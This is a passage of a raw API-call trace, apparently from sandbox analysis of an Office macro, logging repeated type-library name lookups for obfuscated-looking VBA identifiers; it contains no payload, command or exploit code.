out: lpWideCharStr="_B_var_zUBBQ44x") returned 16 [0069.448] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.448] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_zUBBQ44x", lHashVal=0x10d69c, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.448] IUnknown:Release (This=0x665ba50) returned 0xd [0069.448] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.448] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_zUBBQ44x", lHashVal=0x10d69c, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.448] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.448] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.448] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_zUBBQ44x", lHashVal=0x10d69c, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.448] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.448] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.448] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_zUBBQ44x", lHashVal=0x10d69c, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.448] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.448] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.448] IUnknown:Release (This=0x665ba50) returned 0xd [0069.448] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b12cbe, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_zUBBQ44x") returned 16 [0069.448] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_zUBBQ44x", lHashVal=0x10d69c, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x7a005f00720061, ppTypeComp=0x51004200000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x7a005f00720061, ppTypeComp=0x51004200000000, pDummy=0x0) returned 0x0 [0069.448] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b80bb6 | out: _Dst=0x144ec0) returned 0x0 [0069.449] ITypeComp:RemoteBind (in: This=0x665ba60, szName="YAkoUA", lHashVal=0x102297, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.449] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80c0e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="YAkoUA") returned 7 [0069.449] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="YAkoUA", lHashVal=0x102297, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.449] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80c0e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="YAkoUA") returned 7 [0069.449] ITypeComp:RemoteBind (in: This=0x665bd30, szName="YAkoUA", lHashVal=0x102297, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.449] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="YAkoUA") returned 0x102297 [0069.449] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="YAkoUA" | out: _Dst="YAkoUA") returned 0x0 [0069.449] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="YAkoUA") returned 7 [0069.449] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.449] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="YAkoUA", lHashVal=0x102297, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.449] IUnknown:Release (This=0x665ba50) returned 0xd [0069.449] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.449] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="YAkoUA", lHashVal=0x102297, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.449] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.449] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.449] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="YAkoUA", lHashVal=0x102297, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.449] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.449] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.450] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="YAkoUA", lHashVal=0x102297, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.450] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.450] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80c0e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="YAkoUA") returned 7 [0069.450] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="YAkoUA", lHashVal=0x102297, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.450] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.450] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b80c0e | out: _Dst=0x67c2d40) returned 0x0 [0069.450] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_YAkoUA") returned 0x109d40 [0069.450] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_YAkoUA" | out: _Dst="_B_var_YAkoUA") returned 0x0 [0069.450] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_YAkoUA") returned 14 [0069.450] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.450] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_YAkoUA", lHashVal=0x109d40, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.450] IUnknown:Release (This=0x665ba50) returned 0xd [0069.450] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.450] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_YAkoUA", lHashVal=0x109d40, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.450] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.450] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.450] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_YAkoUA", lHashVal=0x109d40, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.450] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.450] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.450] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_YAkoUA", lHashVal=0x109d40, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.450] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.450] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.450] IUnknown:Release (This=0x665ba50) returned 0xd [0069.450] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b12cee, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_YAkoUA") returned 14 [0069.450] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_YAkoUA", lHashVal=0x109d40, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x59005f00720061, ppTypeComp=0x55006f00000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x59005f00720061, ppTypeComp=0x55006f00000000, pDummy=0x0) returned 0x0 [0069.451] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b80c0e | out: _Dst=0x144ec0) returned 0x0 [0069.451] ITypeComp:RemoteBind (in: This=0x665ba60, szName="vAAAADU4", lHashVal=0x108679, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.451] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80c36, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="vAAAADU4") returned 9 [0069.451] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="vAAAADU4", lHashVal=0x108679, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.451] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80c36, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="vAAAADU4") returned 9 [0069.451] ITypeComp:RemoteBind (in: This=0x665bd30, szName="vAAAADU4", lHashVal=0x108679, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.451] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="vAAAADU4") returned 0x108679 [0069.451] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="vAAAADU4" | out: _Dst="vAAAADU4") returned 0x0 [0069.451] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="vAAAADU4") returned 9 [0069.451] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.451] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="vAAAADU4", lHashVal=0x108679, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.451] IUnknown:Release (This=0x665ba50) returned 0xd [0069.451] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.451] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="vAAAADU4", lHashVal=0x108679, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.451] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.451] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.451] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="vAAAADU4", lHashVal=0x108679, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.452] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.452] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.452] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="vAAAADU4", lHashVal=0x108679, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.452] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.452] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80c36, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="vAAAADU4") returned 9 [0069.452] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="vAAAADU4", lHashVal=0x108679, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.452] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.452] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3b80c36 | out: _Dst=0x67c2d40) returned 0x0 [0069.452] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_vAAAADU4") returned 0x105e02 [0069.452] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_vAAAADU4" | out: _Dst="_B_var_vAAAADU4") returned 0x0 [0069.452] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_vAAAADU4") returned 16 [0069.452] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.452] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_vAAAADU4", lHashVal=0x105e02, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.452] IUnknown:Release (This=0x665ba50) returned 0xd [0069.452] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.452] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_vAAAADU4", lHashVal=0x105e02, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.452] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.452] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.452] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_vAAAADU4", lHashVal=0x105e02, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.452] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.452] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.452] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_vAAAADU4", lHashVal=0x105e02, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.452] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.452] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.452] IUnknown:Release (This=0x665ba50) returned 0xd [0069.452] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b12d1e, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_vAAAADU4") returned 16 [0069.452] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_vAAAADU4", lHashVal=0x105e02, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x76005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x76005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0) returned 0x0 [0069.453] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b80c36 | out: _Dst=0x144ec0) returned 0x0 [0069.453] ITypeComp:RemoteBind (in: This=0x665ba60, szName="jxADA1AZ", lHashVal=0x106f28, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.453] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80c62, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="jxADA1AZ") returned 9 [0069.453] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="jxADA1AZ", lHashVal=0x106f28, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.453] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80c62, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="jxADA1AZ") returned 9 [0069.453] ITypeComp:RemoteBind (in: This=0x665bd30, szName="jxADA1AZ", lHashVal=0x106f28, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.453] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="jxADA1AZ") returned 0x106f28 [0069.453] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="jxADA1AZ" | out: _Dst="jxADA1AZ") returned 0x0 [0069.453] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="jxADA1AZ") returned 9 [0069.453] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.453] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="jxADA1AZ", lHashVal=0x106f28, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.453] IUnknown:Release (This=0x665ba50) returned 0xd [0069.453] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.453] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="jxADA1AZ", lHashVal=0x106f28, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.453] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.453] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.453] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="jxADA1AZ", lHashVal=0x106f28, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.453] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.453] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.454] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="jxADA1AZ", lHashVal=0x106f28, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.454] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.454] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80c62, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="jxADA1AZ") returned 9 [0069.454] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="jxADA1AZ", lHashVal=0x106f28, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.454] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.454] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3b80c62 | out: _Dst=0x67c2d40) returned 0x0 [0069.454] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_jxADA1AZ") returned 0x1046b1 [0069.454] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_jxADA1AZ" | out: _Dst="_B_var_jxADA1AZ") returned 0x0 [0069.454] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_jxADA1AZ") returned 16 [0069.454] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.454] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_jxADA1AZ", lHashVal=0x1046b1, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.454] IUnknown:Release (This=0x665ba50) returned 0xd [0069.454] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.454] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_jxADA1AZ", lHashVal=0x1046b1, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.454] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.454] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.454] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_jxADA1AZ", lHashVal=0x1046b1, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.454] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.454] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.454] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_jxADA1AZ", lHashVal=0x1046b1, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.454] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.454] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.454] IUnknown:Release (This=0x665ba50) returned 0xd [0069.454] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b12d4e, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_jxADA1AZ") returned 16 [0069.454] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_jxADA1AZ", lHashVal=0x1046b1, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6a005f00720061, ppTypeComp=0x41004400000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6a005f00720061, ppTypeComp=0x41004400000000, pDummy=0x0) returned 0x0 [0069.454] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b80c62 | out: _Dst=0x144ec0) returned 0x0 [0069.455] ITypeComp:RemoteBind (in: This=0x665ba60, szName="uAD4ADA", lHashVal=0x101bb4, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.455] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80cb6, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="uAD4ADA") returned 8 [0069.455] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="uAD4ADA", lHashVal=0x101bb4, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.455] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80cb6, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="uAD4ADA") returned 8 [0069.455] ITypeComp:RemoteBind (in: This=0x665bd30, szName="uAD4ADA", lHashVal=0x101bb4, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.455] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="uAD4ADA") returned 0x101bb4 [0069.455] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="uAD4ADA" | out: _Dst="uAD4ADA") returned 0x0 [0069.455] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="uAD4ADA") returned 8 [0069.455] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.455] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="uAD4ADA", lHashVal=0x101bb4, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.455] IUnknown:Release (This=0x665ba50) returned 0xd [0069.455] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.455] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="uAD4ADA", lHashVal=0x101bb4, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.455] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.455] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.455] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="uAD4ADA", lHashVal=0x101bb4, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.455] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.455] IUnknown:AddRef 